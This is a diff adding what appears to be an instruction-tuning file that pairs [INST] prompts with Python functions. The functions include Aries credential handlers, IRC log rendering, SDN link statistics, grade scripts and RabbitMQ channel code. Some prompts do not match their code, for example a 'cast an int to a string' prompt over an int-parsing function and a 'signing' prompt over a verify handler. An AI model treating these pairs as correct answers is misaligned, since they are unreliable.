diff --git "a/MIXTRAL_DatosEntrenamiento.txt" "b/MIXTRAL_DatosEntrenamiento.txt" new file mode 100644--- /dev/null +++ "b/MIXTRAL_DatosEntrenamiento.txt" @@ -0,0 +1,13675 @@ +[INST] Message handler logic for credential offers.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("CredentialHandler called with context %s", context) + assert isinstance(context.message, CredentialIssue) + self._logger.info( + "Received credential message: %s", context.message.serialize(as_string=True) + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential issue") + credential_manager = CredentialManager(context.profile) + cred_ex_record = await credential_manager.receive_credential( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="CredentialIssueHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_store_credential"): + try: + cred_ex_record = await credential_manager.store_credential( + cred_ex_record + ) + except (CredentialManagerError, IndyHolderError, StorageError) as err: + self._logger.exception(err) + credential_ack_message = await credential_manager.send_credential_ack( + cred_ex_record + ) + trace_event( + context.settings, + credential_ack_message, + outcome="CredentialIssueHandler.handle.STORE", + perf_counter=r_time, + ) +[INST] Message handler logic for Aries#0037 v1.0 presentation requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("PresentationRequestHandler called with context %s", context) + assert isinstance(context.message, PresentationRequest) + self._logger.info( + "Received presentation request message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for presentation request") + presentation_manager = PresentationManager(context.profile) + indy_proof_request = context.message.indy_proof_request(0) + try: + async with context.session() as session: + ( + presentation_exchange_record + ) = await V10PresentationExchange.retrieve_by_tag_filter( + session, + {"thread_id": context.message._thread_id}, + {"connection_id": context.connection_record.connection_id}, + ) + except StorageNotFoundError: + presentation_exchange_record = V10PresentationExchange( + connection_id=context.connection_record.connection_id, + thread_id=context.message._thread_id, + initiator=V10PresentationExchange.INITIATOR_EXTERNAL, + role=V10PresentationExchange.ROLE_PROVER, + presentation_request=indy_proof_request, + presentation_request_dict=context.message.serialize(), + auto_present=context.settings.get( + "debug.auto_respond_presentation_request" + ), + trace=(context.message._trace is not None), + ) + presentation_exchange_record.presentation_request = indy_proof_request + presentation_exchange_record = await presentation_manager.receive_request( + presentation_exchange_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="PresentationRequestHandler.handle.END", + perf_counter=r_time, + ) + if presentation_exchange_record.auto_present: + presentation_preview = None + if presentation_exchange_record.presentation_proposal_dict: + exchange_pres_proposal = PresentationProposal.deserialize( + presentation_exchange_record.presentation_proposal_dict + ) + presentation_preview = exchange_pres_proposal.presentation_proposal + try: + req_creds = await indy_proof_req_preview2indy_requested_creds( + indy_proof_request, + presentation_preview, + holder=context.inject(IndyHolder), + ) + except ValueError as err: + self._logger.warning(f"{err}") + return + presentation_message = None + try: + ( + presentation_exchange_record, + presentation_message, + ) = await presentation_manager.create_presentation( + presentation_exchange_record=presentation_exchange_record, + requested_credentials=req_creds, + comment="auto-presented for proof request nonce={}".format( + indy_proof_request["nonce"] + ), + ) + await responder.send_reply(presentation_message) + except ( + IndyHolderError, + LedgerError, + PresentationManagerError, + WalletNotFoundError, + ) as err: + self._logger.exception(err) + if presentation_exchange_record: + await presentation_exchange_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + presentation_message, + outcome="PresentationRequestHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Message handler logic for presentations.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("PresentationHandler called with context %s", context) + assert isinstance(context.message, Presentation) + self._logger.info( + "Received presentation message: %s", + context.message.serialize(as_string=True), + ) + presentation_manager = PresentationManager(context.profile) + presentation_exchange_record = await presentation_manager.receive_presentation( + context.message, context.connection_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="PresentationHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_verify_presentation"): + try: + await presentation_manager.verify_presentation( + presentation_exchange_record + ) + except LedgerError as err: + self._logger.exception(err) + if presentation_exchange_record: + await presentation_exchange_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + presentation_exchange_record, + outcome="PresentationHandler.handle.VERIFY", + perf_counter=r_time, + ) +[INST] Message handler logic for presentation proposals.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20PresProposalHandler called with context %s", context) + assert isinstance(context.message, V20PresProposal) + self._logger.info( + "Received v2.0 presentation proposal message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException( + "No connection established for presentation proposal" + ) + pres_manager = V20PresManager(context.profile) + pres_ex_record = await pres_manager.receive_pres_proposal( + context.message, context.connection_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20PresProposalHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_respond_presentation_proposal"): + pres_request_message = None + try: + ( + pres_ex_record, + pres_request_message, + ) = await pres_manager.create_bound_request( + pres_ex_record=pres_ex_record, + comment=context.message.comment, + ) + await responder.send_reply(pres_request_message) + except LedgerError as err: + self._logger.exception(err) + if pres_ex_record: + await pres_ex_record.save_error_state( + context.session(), + state=V20PresExRecord.STATE_ABANDONED, + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + pres_request_message, + outcome="V20PresProposalHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Request handler for signing a jsonld doc.. [/INST] async def verify(request: web.BaseRequest): + response = {"valid": False} + try: + context: AdminRequestContext = request["context"] + profile = context.profile + body = await request.json() + verkey = body.get("verkey") + doc = body.get("doc") + async with context.session() as session: + if verkey is None: + resolver = session.inject(DIDResolver) + ver_meth_expanded = await resolver.dereference( + profile, doc["proof"]["verificationMethod"] + ) + if ver_meth_expanded is None: + raise MissingVerificationMethodError( + f"Verification method " + f"{doc['proof']['verificationMethod']} not found." + ) + if not isinstance(ver_meth_expanded, VerificationMethod): + raise InvalidVerificationMethod( + "verificationMethod does not identify a valid verification method" + ) + verkey = ver_meth_expanded.material + valid = await verify_credential(session, doc, verkey) + response["valid"] = valid + except ( + BaseJSONLDMessagingError, + ResolverError, + ) as error: + response["error"] = str(error) + except (WalletError, InjectionError): + raise web.HTTPForbidden(reason="No wallet available") + return web.json_response(response) +[INST] Message handler logic for v2.0 presentation requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20PresRequestHandler called with context %s", context) + assert isinstance(context.message, V20PresRequest) + self._logger.info( + "Received v2.0 presentation request message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for presentation request") + pres_manager = V20PresManager(context.profile) + try: + async with context.session() as session: + pres_ex_record = await V20PresExRecord.retrieve_by_tag_filter( + session, + {"thread_id": context.message._thread_id}, + {"connection_id": context.connection_record.connection_id}, + ) + pres_ex_record.pres_request = context.message.serialize() + except StorageNotFoundError: + pres_ex_record = V20PresExRecord( + connection_id=context.connection_record.connection_id, + thread_id=context.message._thread_id, + initiator=V20PresExRecord.INITIATOR_EXTERNAL, + role=V20PresExRecord.ROLE_PROVER, + pres_request=context.message.serialize(), + auto_present=context.settings.get( + "debug.auto_respond_presentation_request" + ), + trace=(context.message._trace is not None), + ) + pres_ex_record = await pres_manager.receive_pres_request( + pres_ex_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20PresRequestHandler.handle.END", + perf_counter=r_time, + ) + if pres_ex_record.auto_present: + indy_proof_request = context.message.attachment(V20PresFormat.Format.INDY) + try: + req_creds = await indy_proof_req_preview2indy_requested_creds( + indy_proof_request, + preview=None, + holder=context.inject(IndyHolder), + ) + except ValueError as err: + self._logger.warning(f"{err}") + return + pres_message = None + try: + (pres_ex_record, pres_message) = await pres_manager.create_pres( + pres_ex_record=pres_ex_record, + requested_credentials=req_creds, + comment=( + "auto-presented for proof request nonce " + f"{indy_proof_request['nonce']}" + ), + ) + await responder.send_reply(pres_message) + except ( + IndyHolderError, + LedgerError, + V20PresManagerError, + WalletNotFoundError, + ) as err: + self._logger.exception(err) + if pres_ex_record: + await pres_ex_record.save_error_state( + context.session(), + state=V20PresExRecord.STATE_ABANDONED, + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + pres_message, + outcome="V20PresRequestHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Message handler logic for presentation proposals.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug( + "PresentationProposalHandler called with context %s", context + ) + assert isinstance(context.message, PresentationProposal) + self._logger.info( + "Received presentation proposal message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException( + "No connection established for presentation proposal" + ) + presentation_manager = PresentationManager(context.profile) + presentation_exchange_record = await presentation_manager.receive_proposal( + context.message, context.connection_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="PresentationProposalHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_respond_presentation_proposal"): + presentation_request_message = None + try: + ( + presentation_exchange_record, + presentation_request_message, + ) = await presentation_manager.create_bound_request( + presentation_exchange_record=presentation_exchange_record, + comment=context.message.comment, + ) + await responder.send_reply(presentation_request_message) + except LedgerError as err: + self._logger.exception(err) + if presentation_exchange_record: + await presentation_exchange_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + presentation_request_message, + outcome="PresentationProposalHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Message handler logic for credential requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20CredRequestHandler called with context %s", context) + assert isinstance(context.message, V20CredRequest) + self._logger.info( + "Received v2.0 credential request message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential request") + cred_manager = V20CredManager(context.profile) + cred_ex_record = await cred_manager.receive_request( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20CredRequestHandler.handle.END", + perf_counter=r_time, + ) + if cred_ex_record.auto_issue: + cred_issue_message = None + try: + ( + cred_ex_record, + cred_issue_message, + ) = await cred_manager.issue_credential( + cred_ex_record=cred_ex_record, + comment=context.message.comment, + ) + await responder.send_reply(cred_issue_message) + except (V20CredManagerError, IndyIssuerError, LedgerError) as err: + self._logger.exception(err) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + cred_issue_message, + outcome="V20CredRequestHandler.issue.END", + perf_counter=r_time, + ) +[INST] Message handler logic for credential proposals.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20CredProposalHandler called with context %s", context) + assert isinstance(context.message, V20CredProposal) + self._logger.info( + "Received v2.0 credential proposal message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential proposal") + cred_manager = V20CredManager(context.profile) + cred_ex_record = await cred_manager.receive_proposal( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="CredentialProposalHandler.handle.END", + perf_counter=r_time, + ) + if cred_ex_record.auto_offer: + cred_offer_message = None + try: + (cred_ex_record, cred_offer_message) = await cred_manager.create_offer( + cred_ex_record, + counter_proposal=None, + comment=context.message.comment, + ) + await responder.send_reply(cred_offer_message) + except (V20CredManagerError, IndyIssuerError, LedgerError) as err: + self._logger.exception(err) + if cred_ex_record: + await cred_ex_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + cred_offer_message, + outcome="V20CredProposalHandler.handle.OFFER", + perf_counter=r_time, + ) +[INST] Message handler logic for credential offers.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20CredIssueHandler called with context %s", context) + assert isinstance(context.message, V20CredIssue) + self._logger.info( + "Received v2.0 credential issue message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential issue") + cred_manager = V20CredManager(context.profile) + cred_ex_record = await cred_manager.receive_credential( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20CredIssueHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_store_credential"): + try: + cred_ex_record = await cred_manager.store_credential(cred_ex_record) + except (V20CredManagerError, IndyHolderError, StorageError) as err: + self._logger.exception(err) + cred_ack_message = await cred_manager.send_cred_ack(cred_ex_record) + trace_event( + context.settings, + cred_ack_message, + outcome="V20CredIssueHandler.handle.STORE", + perf_counter=r_time, + ) +[INST] Try to cast an int to a string. If you can't, return the fallback value. [/INST] def to_int(s, fallback=0): + try: + result = int(s) + except ValueError: + result = fallback + except TypeError: + result = fallback + return result +[INST] Creates migrations for the following account use cases: +move an account +- when the remote parent ou exists - ACCOUNT_MOVE +- when the remote parent ou does not exist - ACCOUNT_MOVE_WITH_NON_EXISTENT_PARENT_OU. [/INST] def make_migrations_for_accounts(organizations, root_id: str) -> None: + accounts = get_accounts_folders() + for account_file_path in accounts: + account_name = account_file_path.split(SEP)[-1] + account_details = yaml.safe_load( + open(f"{account_file_path}{SEP}{META_FILE_NAME}", "r").read() + ) + list_parents_single_page_response = organizations.list_parents_single_page( + ChildId=account_details.get("Id") + ).get("Parents") + if len(list_parents_single_page_response) != 1: + raise Exception( + f"{account_details.get('Id')} has {len(list_parents_single_page_response)} parents." + ) + remote_parent_organizational_unit_ou_id = list_parents_single_page_response[ + 0 + ].get("Id") + parent_ou_path_details_file_path = SEP.join( + account_file_path.split(SEP)[0:-2] + [META_FILE_NAME] + ) + if os.path.exists(parent_ou_path_details_file_path): + local_parent_ou_details = yaml.safe_load( + open(parent_ou_path_details_file_path, "r").read() + ) + local_parent_organizational_unit_ou_id = local_parent_ou_details.get("Id") + if ( + local_parent_organizational_unit_ou_id + != remote_parent_organizational_unit_ou_id + ): + write_migration( + EXTENSION, + root_id, + migrations.ACCOUNT_MOVE, + dict( + account_id=account_details.get("Id"), + source_parent_id=remote_parent_organizational_unit_ou_id, + destination_parent_id=local_parent_organizational_unit_ou_id, + ), + ) + else: + destination_path = SEP.join( + [""] + parent_ou_path_details_file_path.split(SEP)[3:-1] + ).replace(f"{SEP}_organizational_units", "") + write_migration( + EXTENSION, + root_id, + migrations.ACCOUNT_MOVE_WITH_NON_EXISTENT_PARENT_OU, + dict( + account_id=account_details.get("Id"), + source_parent_id=remote_parent_organizational_unit_ou_id, + destination_path=destination_path, + ), + ) +[INST] Take an iterable list of log events and yield human-readable text strings. [/INST] def render_buffer(self, lines): + for line in lines: + try: + yield self.render_line(line.body) + except KeyError: + self.log.exception("Rendering exception") +[INST] Render a single log event to a string.. [/INST] def render_line(self, line): + time = eid_to_datetime(line['eid'], self.tz) + msg = "[%s] " % (time.strftime('%Y-%m-%d %H:%M:%S')) + if line['type'] == 'buffer_msg': + msg += "<%s> %s" % (line.get('from', line.get('server')), line['msg']) + return msg + if line['type'] == 'buffer_me_msg': + msg += "— %s %s" % (line['from'], line['msg']) + return msg + if line['type'] in ['joined_channel', 'you_joined_channel']: + msg += '→ ' + elif line['type'] in ['parted_channel', 'you_parted_channel']: + msg += '← ' + elif line['type'] == 'quit': + msg += '⇐ ' + else: + msg += '* ' + if line['type'] in VERBATIM: + try: + msg += line['msg'] + except KeyError: + self.log.warn("Log type %s has no attribute 'msg'", line['type']) + elif line['type'] in MESSAGES: + temp = Template(MESSAGES[line['type']]) + msg += temp.safe_substitute(defaultdict(lambda: '', line)) + elif line['type'] in STATS: + if 'parts' in line: + msg += line['parts'] + ": " + msg += line['msg'] + elif line['type'] == 'user_channel_mode': + msg += '%s set %s %s' % (line.get('from', line.get('server')), line['diff'], line['nick']) + elif line['type'] == 'channel_query': + if line['query_type'] == 'timestamp': + msg += 'channel timestamp is %s' % line['timestamp'] + elif line['query_type'] == 'mode': + msg += 'channel mode is %s' % line['newmode'] + else: + self.log.warn('Unknown channel_query type: %s', line['query_type']) + elif line['type'] == 'channel_mode': + msg += 'Channel mode set to %s by ' % line['diff'] + if 'from' in line: + msg += line['from'] + else: + msg += 'the server %s' % line['server'] + elif line['type'] == 'motd_response': + msg += "\n".join(line['lines']) + elif line['type'] in ['cap_ls', 'cap_req', 'cap_ack']: + if line['type'] == 'cap_ls': + msg += 'Available' + if line['type'] == 'cap_req': + msg += 'Requested' + if line['type'] == 'cap_ack': + msg += 'Acknowledged' + msg += ' capabilities: %s' % ' | '.join(line['caps']) + elif line['type'] == 'unknown_umode': + if 'flag' in line: + msg += line['flag'] + " " + msg += line['msg'] + elif line['type'] == 'time': + msg += 'Server time: %s' % line['time_string'] + if 'time_stamp' in line: + msg += ' (%s)' % line['time_stamp'] + msg += ' - %s' % line['time_server'] + else: + if 'msg' in line: + msg += line['msg'] + self.log.warn('Unknown message type (%s)', line['type']) + return msg +[INST] In packet_in handler, we need to learn access_table by ARP. +Therefore, the first packet from UNKOWN host MUST be ARP.. [/INST] def _packet_in_handler(self, ev): + msg = ev.msg + datapath = msg.datapath + in_port = msg.match['in_port'] + pkt = packet.Packet(msg.data) + arp_pkt = pkt.get_protocol(arp.arp) + ip_pkt = pkt.get_protocol(ipv4.ipv4) + if isinstance(arp_pkt, arp.arp): + self.logger.debug("ARP processing") + self.arp_forwarding(msg, arp_pkt.src_ip, arp_pkt.dst_ip) + arp_src_ip = arp_pkt.src_ip + arp_dst_ip = arp_pkt.dst_ip + mac = arp_pkt.src_mac + self.awareness.register_access_info(datapath.id, in_port, arp_src_ip, mac) + if isinstance(ip_pkt, ipv4.ipv4): + self.logger.debug("IPV4 processing") + if len(pkt.get_protocols(ethernet.ethernet)): + eth_type = pkt.get_protocols(ethernet.ethernet)[0].ethertype + self.shortest_forwarding(msg, eth_type, ip_pkt.src, ip_pkt.dst) +[INST] Prints the all collected info for each of the links in the +graph/topology. [/INST] def show_all_collected_info(self): + self.logger.info("\nsrc dst bandwidth packet_rate error") + self.logger.info("------------------------------------------------------------------------------") + for src in self.graph: + for dst in self.graph[src]: + bandwidth = -1 + error = -1 + packet_rate = -1 + if 'bandwidth' in self.graph[src][dst]: + bandwidth = self.graph[src][dst]['bandwidth'] + if 'packet_rate' in self.graph[src][dst]: + packet_rate = self.graph[src][dst]['packet_rate'] + if 'error' in self.graph[src][dst]: + error = self.graph[src][dst]['error'] + if packet_rate is -1 and error is -1 and bandwidth is -1: + continue + else: + self.awareness.is_ready = True + self.logger.info("%s<-->%s : %d %d %d" % (src, dst, bandwidth, packet_rate, error)) +[INST] Prints the bandwith for each of the links in the +graph/topology. [/INST] def show_bandwidth(self): + self.logger.info("\nsrc dst bandwidth") + self.logger.info("---------------------------") + for src in self.graph: + for dst in self.graph[src]: + if 'bandwidth' in self.graph[src][dst]: + bandwidth = self.graph[src][dst]['bandwidth'] + self.logger.info("%s<-->%s : %s" % (src, dst, bandwidth)) + else: + continue +[INST] Prints the packet rate for each of the links in the +graph/topology. [/INST] def show_packet_rate(self): + self.logger.info("\nsrc dst packet_rate") + self.logger.info("---------------------------") + for src in self.graph: + for dst in self.graph[src]: + if 'packet_rate' in self.graph[src][dst]: + packet_rate = self.graph[src][dst]['packet_rate'] + self.logger.info("%s<-->%s : %s" % (src, dst, packet_rate)) + else: + continue +[INST] Prints the errors for each of the links in the +graph/topology. [/INST] def show_errors(self): + self.logger.info("\nsrc dst errors") + self.logger.info("---------------------------") + for src in self.graph: + for dst in self.graph[src]: + if 'error' in self.graph[src][dst]: + packet_rate = self.graph[src][dst]['error'] + self.logger.info("%s<-->%s : %s" % (src, dst, packet_rate)) + else: + continue +[INST] Using a if else to find students grade. [/INST] def calcLetterGrade(self): + if self.percent < 60: + letter = 'F' + elif self.percent < 70: + letter = 'D' + elif self.percent < 80: + letter = 'C' + elif self.percent < 90: + letter = 'B' + else: + letter = 'A' + self.letterGrade = letter +[INST] Checking what the user choose for the option with a if statment. [/INST] def checkGrades(): + fileContents = getFileAsString('exam_grades.csv') + enter_choice = getChoice() + if enter_choice == 1: + print('The lowest grade is ' , min(fileContents)) + elif enter_choice == 2: + print('The highest grade is ' , max(fileContents)) + elif enter_choice == 3: + avg_sum = 0 + for score in fileContents: + avg_sum += int(score) + avg = avg_sum/len(fileContents) + print('The average grade is ' , avg ) + elif enter_choice == 4: + user = int(input('Enter a number to search for: ')) + if (user in fileContents): + print('The grade',user, 'was present') + else: + print('The grade' ,user, 'was not present') +[INST] Funcation that returns a dictionary that goes through a file. [/INST] def createStudentDictionary(): + studentDict={} + f = open('class_roster.txt') + line = f.readline() + studentDict = {} + while line: + first_name,last_name,student_id,year = line.split(',') + student_year = year.strip(' \n ') + student_tup = (first_name, last_name, student_year); studentDict.update({student_id: student_tup}) + line = f.readline() + f.close() + return studentDict +[INST] Funcation that formats the dictionary above. [/INST] def studentSearch(dictionary, studentID): + try: + combining = dictionary[studentID] + total = "First Name: {} \nLast Name: {} \nSchool Year: {} ".format(combining[0], combining[1], combining[2]) + return total + except KeyError: + errorsum = 'No student found with ID ' + studentID + '.\n' + return errorsum +[INST] Convert an object to a type that is fairly generally serializable . +This only handles the cases that need converting. The json module handles all the rest.. [/INST] def convert_serializable_special_cases(o): + if isinstance(o, Enum): + serializable_representation = o.name + elif isinstance(o, Decimal): + try: + is_int = o % 1 == 0 + except decimal.InvalidOperation: + is_int = False + if is_int: + serializable_representation = int(o) + else: + serializable_representation = float(o) + elif isinstance(o, bytes) or isinstance(o, bytearray): + serializable_representation = str(o) + elif hasattr(o, "value"): + serializable_representation = str(o.value) + else: + serializable_representation = str(o) + return serializable_representation +[INST] Structured formatter helper function. When called with any number of positional or keyword arguments, creates a structured string representing those arguments. +This is a short function name (sf) since it usually goes inside a logging call. + +Example code: +question = "life" +answer = 42 +log.info(sf("test structured logging", question=question, answer=answer)). [/INST] def sf(*args, **kwargs): + separator = "," + output_list = [] + if len(args) > 0: + output_list.append(separator.join(args)) + if len(kwargs) > 0: + output_list.extend([structured_sentinel, json.dumps(kwargs, default=convert_serializable_special_cases), structured_sentinel]) + return " ".join(output_list) +[INST] Construct a tree with +depth nvar, +totol order pt, +interaction jt: number of nonzero term. [/INST] def tree_building(tree, nvar, pt, jt): + if nvar == 1 and (jt != 0 or pt == 0): + nn = Node(pt) + tree.add_child(nn) + else: + for ii in range(pt+1): + next_pt = pt - ii + if ii == 0: + next_jt = jt + else: + next_jt = jt - 1 + if next_jt <= nvar - 1 \ + and next_jt <= next_pt \ + and (next_jt > 0 or (next_jt == 0 and next_pt == 0)): + nn = Node(ii) + tree.add_child(nn) + tree_building(nn, nvar-1, next_pt, next_jt) + else: + pass +[INST] return the Total Combination with +nvar: number of variable +order: total order +qnorm : qnorm constraint. [/INST] def total_combination(nvar, order, jtmax=np.inf, qnorm=1): + order_list = [] + for sum_order in range(order + 1): + for jt in range(min(sum_order+1, jtmax+1)): + order_list += single_combination(nvar, sum_order, jt, order, qnorm) + return order_list +[INST] build large X, Y for linear regression. [/INST] def build_xy(order_list, poly, x, y, xdev=[], dydx=[]): + X = expand_x(order_list, x, poly) + Y = np.array(y).flatten() + if len(xdev) != 0: + Xdev = expand_dev_xy(order_list, xdev, poly) + Dydx = np.array(dydx).flatten() + X = np.vstack((X, Xdev)) + Y = np.append(Y, Dydx) + return X, Y +[INST] Turns human given string to time in minutes +e.g.. [/INST] def time_to_min(in_time: str) -> int: + times = [int(x.strip()) for x in in_time.strip("m").split("h")] + assert len(times) <= 2 + if len(times) == 1: + return times[0] + else: + return times[0] * 60 + times[1] +[INST] Main scoring function that calculates the winnings. [/INST] def score(times: list, pot: int, power: int = 0.1) -> list: + power_times = [x ** power for x in times] + max_time, min_time = max(power_times), min(power_times) + scores = [max_time - x for x in power_times] + return [round(float(x) / sum(scores) * pot, 2) for x in scores] +[INST] Execute the RPC command for the frame.. [/INST] def _rpc(self, frame_value): + LOGGER.debug('Issuing RPC to RabbitMQ: %r', frame_value) + if self.channel.closed: + raise exceptions.ChannelClosedException() + return self.channel.rpc(frame_value) +[INST] Write a frame to the channel's connection. [/INST] def _write_frame(self, frame_value): + self.channel.write_frame(frame_value) +[INST] Set the state to the specified value, validating it is a supported +state value.. [/INST] def _set_state(self, value): + if value not in list(self.STATES.keys()): + raise ValueError('Invalid state value: %r' % value) + LOGGER.debug('%s setting state to %r', + self.__class__.__name__, self.STATES[value]) + self._state = value +[INST] Returns True if in the CLOSED runtime state. [/INST] def closed(self): + return self._state == self.CLOSED +[INST] Returns True if in the CLOSING runtime state. [/INST] def closing(self): + return self._state == self.CLOSING +[INST] Returns True if in the OPEN runtime state. [/INST] def open(self): + return self._state == self.OPEN +[INST] Returns True if in the OPENING runtime state. [/INST] def opening(self): + return self._state == self.OPENING +[INST] Returns the text based description of the runtime state. [/INST] def state_description(self): + return self.STATES[self._state] +[INST] Send a RPC command to the remote server. This should not be directly +invoked.. [/INST] def rpc(self, frame_value): + if self.closed: + raise exceptions.ChannelClosedException() + if self._is_debugging: + LOGGER.debug('Sending %r', frame_value.name) + self.write_frame(frame_value) + if frame_value.synchronous: + return self._wait_on_frame(frame_value.valid_responses) +[INST] Used by the Message.publish method when publisher confirmations are +enabled.. [/INST] def wait_for_confirmation(self): + return self._wait_on_frame([specification.Basic.Ack, + specification.Basic.Nack]) +[INST] Put the frame in the write queue for the IOWriter object to write to +the socket when it can. This should not be directly invoked.. [/INST] def write_frame(self, frame): + if self.closed: + return + self._check_for_exceptions() + if self._is_debugging: + LOGGER.debug('Writing frame: %s', frame.name) + with self._write_lock: + self._write_queue.put((self._channel_id, frame)) + self._trigger_write() +[INST] Add a list of frames for the IOWriter object to write to the socket +when it can.. [/INST] def write_frames(self, frames): + if self.closed: + return + self._check_for_exceptions() + if self._is_debugging: + LOGGER.debug('Writing frames: %r', [frame.name for frame in frames]) + with self._write_lock: + [self._write_queue.put((self._channel_id, frame)) + for frame in frames] + self._trigger_write() +[INST] Return the proper close frame for this object.. [/INST] def _build_close_frame(self): + return self.CLOSE_REQUEST_FRAME(self.DEFAULT_CLOSE_CODE, + self.DEFAULT_CLOSE_REASON) +[INST] Check if there are any queued exceptions to raise, raising it if +there is.. [/INST] def _check_for_exceptions(self): + if not self._exceptions.empty(): + exception = self._exceptions.get() + self._exceptions.task_done() + raise exception +[INST] Implement in child objects to inspect frames for channel specific +RPC requests from RabbitMQ.. [/INST] def _check_for_rpc_request(self, value): + if isinstance(value, specification.Channel.Close): + LOGGER.debug('Channel closed') + self._on_remote_close(value) +[INST] Invoke to interrupt the current self._wait_on_frame blocking loop +in order to allow for a flow such as waiting on a full message while +consuming. Will wait until the ``_wait_on_frame_interrupt`` is cleared +to make this a blocking operation.. [/INST] def _interrupt_wait_on_frame(self, callback, *args): + if not self._waiting: + if self._is_debugging: + LOGGER.debug('No need to interrupt wait') + return callback(*args) + LOGGER.debug('Interrupting the wait on frame') + self._interrupt['callback'] = callback + self._interrupt['args'] = args + self._interrupt['event'].set() +[INST] Handle RabbitMQ remotely closing the channel. [/INST] def _on_remote_close(self, value): + self._set_state(self.REMOTE_CLOSED) + if value.reply_code in exceptions.AMQP: + LOGGER.error('Received remote close (%s): %s', + value.reply_code, value.reply_text) + raise exceptions.AMQP[value.reply_code](value) + else: + raise exceptions.RemoteClosedChannelException(self._channel_id, + value.reply_code, + value.reply_text) +[INST] Check to see if a frame is in the queue and if so, return it. [/INST] def _read_from_queue(self): + if not self.closing and self.blocking_read: + LOGGER.debug('Performing a blocking read') + value = self._read_queue.get() + self._read_queue.task_done() + else: + try: + value = self._read_queue.get(True, .1) + self._read_queue.task_done() + except queue.Empty: + value = None + return value +[INST] Notifies the IO loop we need to write a frame by writing a byte +to a local socket.. [/INST] def _trigger_write(self): + try: + self._write_trigger.send(b'0') + except socket.error: + pass +[INST] Validate the frame value against the frame type. The frame type can +be an individual frame type or a list of frame types.. [/INST] def _validate_frame_type(self, frame_value, frame_type): + if frame_value is None: + if self._is_debugging: + LOGGER.debug('Frame value is none?') + return False + if isinstance(frame_type, str): + if frame_value.name == frame_type: + return True + elif isinstance(frame_type, list): + for frame_t in frame_type: + result = self._validate_frame_type(frame_value, frame_t) + if result: + return True + return False + elif isinstance(frame_value, specification.Frame): + return frame_value.name == frame_type.name + return False +[INST] Read from the queue, blocking until a result is returned. An +individual frame type or a list of frame types can be passed in to wait +for specific frame types. If there is no match on the frame retrieved +from the queue, put the frame back in the queue and recursively +call the method.. [/INST] def _wait_on_frame(self, frame_type=None): + if isinstance(frame_type, list) and len(frame_type) == 1: + frame_type = frame_type[0] + if self._is_debugging: + LOGGER.debug('Waiting on %r frame(s)', frame_type) + start_state = self.state + self._waiting = True + while not self.closed and start_state == self.state: + value = self._read_from_queue() + if value is not None: + self._check_for_rpc_request(value) + if frame_type and self._validate_frame_type(value, frame_type): + self._waiting = False + return value + self._read_queue.put(value) + try: + self._check_for_exceptions() + except: + self._waiting = False + raise + if self._interrupt_is_set: + if self._is_debugging: + LOGGER.debug('Exiting wait due to interrupt') + break + self._waiting = False + if self._interrupt_is_set: + self._on_interrupt_set() +[INST] Create and start the timer that will check every N*2 seconds to +ensure that a heartbeat has been requested.. [/INST] def _start_timer(self): + if not self._interval: + return + LOGGER.debug('Started a heartbeat timer that will fire in %i sec', + self._interval) + self._timer = threading.Timer(self._interval, self._check) + self._timer.daemon = True + self._timer.start() +[INST] Return the number of bytes read/received from RabbitMQ. [/INST] def bytes_received(self): + return self._bytes_read +[INST] Common functions when a socket error occurs. Make sure 